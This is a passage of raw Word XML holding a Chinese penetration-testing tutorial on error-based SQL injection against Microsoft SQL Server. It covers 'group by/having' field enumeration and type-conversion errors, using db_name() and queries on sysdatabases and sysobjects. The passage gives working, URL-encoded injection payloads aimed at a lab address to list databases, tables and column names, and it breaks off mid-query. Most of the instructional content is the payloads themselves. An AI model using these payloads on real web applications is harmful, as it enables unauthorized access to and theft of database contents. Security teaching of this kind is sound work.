    <w:p w14:paraId="6A729B31" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00F9087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地址后提交“having 1=1--"，从返回的错误信息中即可得到当前表名与第一个字段</w:t>
      </w:r>
      <w:r w:rsidR="00C44777" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>名。再继续提交以下代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B8850F" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00644363" w:rsidRDefault="00BD686F"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group by   字段名 1 having  1-1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D57D9F" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00BD686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页面返回的错误信息中，即可得知第二个字段名。继续提交以下代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07410931" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00644363" w:rsidRDefault="006C6D3F"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group by 字段名1,字段名2 having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A5AC4" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00BB0F7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返回第三个字段名。继续提交以下代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948F35C" w14:textId="77777777" w:rsidR="00B419FB" w:rsidRPr="00644363" w:rsidRDefault="00B419FB"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group by 字段名1,字段名2</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段名3</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EACE850" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="0018713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直到页面返回正常信息，即可得到所有的字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A592160" w14:textId="77777777" w:rsidR="00A125C7" w:rsidRPr="00C35923" w:rsidRDefault="00C35923" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2.6.2</w:t>
      </w:r>
      <w:r w:rsidR="00DD79E2" w:rsidRPr="00C35923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考案例</w:t>
      </w:r>
      <w:r w:rsidR="00DD79E2" w:rsidRPr="00C35923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:MsSQL</w:t>
      </w:r>
      <w:r w:rsidR="00DD79E2" w:rsidRPr="00C35923">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆表与字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38623153" w14:textId="77777777" w:rsidR="00DD79E2" w:rsidRPr="00764DAB" w:rsidRDefault="00DD79E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1.爆表名及字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0B01A3" w14:textId="77777777" w:rsidR="00DD79E2" w:rsidRPr="00764DAB" w:rsidRDefault="002328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having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034AA4CF" w14:textId="77777777" w:rsidR="002328BD" w:rsidRDefault="002328BD" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36B5F1EA" wp14:editId="7D0E803C">
            <wp:extent cx="5274310" cy="1653540"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="39" name="图片 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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1653540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A13D76" w14:textId="77777777" w:rsidR="00106B58" w:rsidRDefault="00106B58" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                               图31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFD4C7" w14:textId="77777777" w:rsidR="002328BD" w:rsidRPr="00764DAB" w:rsidRDefault="002328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继续猜解其他字段名，提交以下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375298E8" w14:textId="77777777" w:rsidR="002328BD" w:rsidRPr="00764DAB" w:rsidRDefault="002328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group by admin.id having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C0C21D" w14:textId="77777777" w:rsidR="002328BD" w:rsidRDefault="002328BD" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="305A8305" wp14:editId="1B612F29">
            <wp:extent cx="5274310" cy="1808480"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="40" name="图片 3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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1808480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE3CE77" w14:textId="77777777" w:rsidR="002328BD" w:rsidRPr="00764DAB" w:rsidRDefault="002328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继续猜解当前表中的下一个字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7495DA" w14:textId="77777777" w:rsidR="002328BD" w:rsidRPr="00764DAB" w:rsidRDefault="002328B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group by admin.id</w:t>
      </w:r>
      <w:r w:rsidR="00266EFC">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admin.name having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5B83F" w14:textId="77777777" w:rsidR="002328BD" w:rsidRDefault="00CC031E" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A5AF149" wp14:editId="0DE782F8">
            <wp:extent cx="5274310" cy="1439545"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="41" name="图片 4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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1439545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C99F984" w14:textId="77777777" w:rsidR="00CC031E" w:rsidRPr="00764DAB" w:rsidRDefault="00CC031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用同样的方法，提交爆出其他的数据字段名，直到页面不再返回错误住处，你就可以提到所有的字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A06125F" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00FE2696" w:rsidRDefault="003D5726"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2.7</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F2253" w:rsidRPr="00FE2696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>order by与数据类型转换爆错法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FBA30C" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="0033475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MsSQL数据库打开了错误回显，那么可以通过MsSQL数据库的返回信息爆出所有数据库信息。此方法非常强大，可获得所有数据库名、任意表和字段的名称、内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAE9B7" w14:textId="77777777" w:rsidR="006511E0" w:rsidRPr="00276D91" w:rsidRDefault="006511E0"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爆所有数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D4C99B" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="006511E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直接在注入地址处提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4246F4A9" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00582A85"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F16091">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D604F8" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and db_name() =</w:t>
      </w:r>
      <w:r w:rsidR="00F16091">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00D604F8" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724CE76" w14:textId="77777777" w:rsidR="00582A85" w:rsidRPr="00276D91" w:rsidRDefault="00582A85" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05982AE8" wp14:editId="39B2AC58">
            <wp:extent cx="5274310" cy="1775460"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="42" name="图片 4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
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1775460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A116142" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00CD674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返回的出错信息中即可获得当前数据库名。要爆所有的数据库名，可以使用如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CCD308" w14:textId="77777777" w:rsidR="00930113" w:rsidRPr="00764DAB" w:rsidRDefault="00582A85"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242C6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B418D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and db</w:t>
      </w:r>
      <w:r w:rsidR="004B418D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00A52C77" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>name(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B074A1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A52C77" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C89A44" w14:textId="77777777" w:rsidR="00582A85" w:rsidRPr="00582A85" w:rsidRDefault="00582A85" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="168A904D" wp14:editId="5CCE95C4">
            <wp:extent cx="5274310" cy="1630680"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="43" name="图片 4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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1630680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D32407" w14:textId="77777777" w:rsidR="00083C2E" w:rsidRPr="00764DAB" w:rsidRDefault="00083C2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当数字n为1时，即可得到第一个数据库名，n为2时可得到第二个数据库名。通过增加n的值，可以遍历出所有的数据库名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701A0E29" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00083C2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另外，也可以在注入点后提交如下语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329E3122" w14:textId="77777777" w:rsidR="00EF26AF" w:rsidRPr="00764DAB" w:rsidRDefault="00EF26A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20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(256))%2bchar(94)%2bcast([filename]%20as%20nvarchar(256))%20from%20(select%20top%20</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4B40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CFB11A" w14:textId="77777777" w:rsidR="005E1083" w:rsidRPr="00276D91" w:rsidRDefault="005E1083" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C545817" wp14:editId="4AC46D08">
            <wp:extent cx="5274310" cy="1905000"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="44" name="图片 4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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1905000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCA24CA" w14:textId="77777777" w:rsidR="00020EFC" w:rsidRPr="00276D91" w:rsidRDefault="00020EFC"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lastRenderedPageBreak/>
        <w:t>2.爆</w:t>
      </w:r>
      <w:r w:rsidR="0032121B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前库中的所有表与跨库爆表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F2140C" w14:textId="77777777" w:rsidR="00F16091" w:rsidRDefault="00020EFC"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后提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F8192D" w14:textId="77777777" w:rsidR="00F16091" w:rsidRPr="00F16091" w:rsidRDefault="00F16091" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16091">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.0.102/sqlserver/1.aspx?xxser=1%20and%20(select%20cast(count(1)%20as%20varchar(10))%2bchar(94)%20from%20[sysobjects]%20where%20xtype=char(85)%20and%20status!=1)=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEAC743" w14:textId="77777777" w:rsidR="007C0D24" w:rsidRPr="00276D91" w:rsidRDefault="007C0D24" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C979D5A" wp14:editId="0F7C708C">
            <wp:extent cx="5140960" cy="2228850"/>
            <wp:effectExtent l="1905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140960" cy="2228850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EB2F2D" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00DD739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即可爆出当前数据库中全部表的数目。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DC962" w14:textId="77777777" w:rsidR="00B9301A" w:rsidRPr="00764DAB" w:rsidRDefault="00B9301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20and%20(select%20top%201%20cast%20(name%20as%20varchar(256))%20from(select%20top%202%20id,name%20from%20[sysobjects]%20where%20xtype=char(85)%20and%20status!=1%20order%20by%20id)t%20order%20by%20id%20desc)=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA38E24" w14:textId="77777777" w:rsidR="00B9301A" w:rsidRPr="00B9301A" w:rsidRDefault="00F53E01" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F65F3C" wp14:editId="0DB0595E">
            <wp:extent cx="5274310" cy="2218559"/>
            <wp:effectExtent l="19050" t="0" r="254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2218559"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C90D73D" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00644363" w:rsidRDefault="006A5AC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select</w:t>
      </w:r>
      <w:r w:rsidR="00B829EC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>top 1 cast (name as varchar(256)) from(select top 数字n id,name from [sysobjects] where xtype=char(85) and status! =0 order by id）t order by id desc)=0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E2909" w14:textId="77777777" w:rsidR="00035965" w:rsidRPr="00764DAB" w:rsidRDefault="00035965"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递增上面查询语句中的数字n，就可以遍历出当前数据库中的所有表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D990AFF" w14:textId="77777777" w:rsidR="002A109F" w:rsidRPr="00764DAB" w:rsidRDefault="00035965"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如果要爆出任意数据库中的表名，则可提交如下查询语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3347B27A" w14:textId="77777777" w:rsidR="002D4B40" w:rsidRDefault="002D4B40" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4B40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.0.102/sqlserver/1.aspx?xxser=1 and 0&lt;&gt;(select top 1 name from testdb.dbo.sysobjects where xtype=0x7500 and name not in (select top </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4B40">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4B40">
        <w:rPr>
